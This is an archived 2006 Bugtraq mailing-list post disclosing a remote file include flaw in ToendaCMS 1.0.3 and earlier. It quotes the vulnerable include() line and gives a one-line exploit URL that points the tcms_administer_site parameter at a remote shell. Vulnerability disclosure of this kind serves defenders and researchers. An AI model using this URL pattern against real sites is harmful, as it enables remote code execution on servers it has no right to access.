lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060820075231.30850.qmail@securityfocus.com> Date: 20 Aug 2006 07:52:31 -0000 From: h4ck3riran@...oo.com To: bugtraq@...urityfocus.com Subject: ToendaCMS <= 1.0.3 -(tcms_administer_site) Remote File Include >**************************************************** > Iranians Are The Bests > >**************************************************** > ToendaCMS <= 1.0.3 -(tcms_administer_site) Remote File Include >Descriptions ># Script.............. : ToendaCMS ># Discovered By.... : You_You ># Risk : High ># Class.............. : Remote ># Special Thanx To All Aria-Security's Administrators > > ----------------------------------------------------------------------------------- > >Source : > include($tcms_administer_site.'/tcms_global/database.php') > > >Exploit : > http://www.site.com/path/tcms_administer_site=SHELL